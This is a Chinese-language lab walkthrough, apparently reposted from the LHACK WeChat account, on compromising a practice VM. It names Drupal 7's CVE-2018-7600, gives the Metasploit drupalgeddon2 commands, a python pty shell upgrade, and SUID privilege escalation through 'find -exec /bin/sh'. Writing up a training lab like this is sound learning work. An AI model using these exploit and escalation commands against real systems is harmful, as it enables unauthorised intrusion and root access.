渗透实战(四)

admin 2023年12月18日01:23:28评论33 views字数 1175阅读3分55秒阅读模式

渗透实战(四)

前言:本文中涉及到的技术,只提供思路,严禁用于违法测试
 朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把LHACK安全“设为星标”,否则可能就看不到了啦!

渗透实战(四)

当然哦,还是那句话,还是用靶机吧,希望大家都保护好自己,哈哈哈
以后我会更新各种靶机的渗透,希望大家持续关注,跟着我一起学习吧!!!
我做的很适合初级的学习者,其中不乏趣味性,也有点难度,但总体思路是清晰的,有兴趣的师傅不妨试试。

一、靶机地址

公众号后台回复:靶机四,获取靶机地址。要是打不开去公众号主页加我,我给师傅发。

下载靶机后,双击用vmware打开。

靶机环境:处于NAT网络下的VM虚拟机。


二、靶机渗透

准备一台kali虚拟机,当攻击机。


1、获取目标ip

渗透实战(四)


2、获取目标开放的端口号

渗透实战(四)


3、漏洞探测

我们在上方扫描的nmap过程中,发现目标的网站建站系统是Drupal,我们现在去确定一下。

渗透实战(四)


我们现在去网上查一下这个建站系统存在的历史漏洞,发现他的版本是7。

渗透实战(四)

可以找到这个Drupal7版本对应的cve漏洞。(cve-2018-7600)

渗透实战(四)


4、漏洞利用

发现这个建站系统存在的漏洞,我们用神器,msfconsole工具,kali自带的有这个工具,我们去使用。

msfconsole


渗透实战(四)


先查找Drupal的漏洞。

search drupal


渗透实战(四)


use exploit/unix/webapp/drupal_drupalgeddon2


渗透实战(四)

与此同时,我们去看看需要设置哪些payload。

渗透实战(四)


设置一下攻击目标。

set rhosts 192.168.44.131


渗透实战(四)

成功命令执行漏洞,我们想要使用shell界面,执行一些信息收集。

渗透实战(四)


发现,看不到他的shell,太丑了,美化一下命令行

python -c "import pty;pty.spawn('/bin/bash')"


渗透实战(四)

这样,就美观多了。


5、提权

我们成功获取了他的shell,但是他的权限太低,我们无法利用。

这里,我先使用sudo -l

渗透实战(四)


发现没有什么可利用的,我们使用suid提权。

首先,我们先查找一下,系统上运行的所有SUID位的文件

find / -perm -u=s -type f 2>/dev/null

渗透实战(四)


继续提权,使用find命令:

find . -exec /bin/sh ;


渗透实战(四)


提权成功,寻找flag。

渗透实战(四)



三、总结

以上为我的一些做题笔记,大佬勿喷。

主要是一个大致流程,很多技术还没涉及到,并且并不是只有一种办法,还有其他的渗透办法,大家思想不要局限了。后续打其他靶场会更加丰富!


感谢各位大佬们关注LHACK安全,正在努力的进步中,后续会坚持更新渗透漏洞思路分享、好用工具分享以及挖掘SRC思路等文章,希望能得到各位师傅们的关注与支持。想加入交流群的师傅们,欢迎加我,我拉师傅进群。

渗透实战(四)


往期回顾

记录一次渗透实战(一)


渗透实战(二) 


web漏洞之JWT越权(详解+靶场练习) 

原文始发于微信公众号(LHACK安全):渗透实战(四)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月18日01:23:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透实战(四)http://cn-sec.com/archives/2308303.html

发表评论

匿名网友 填写信息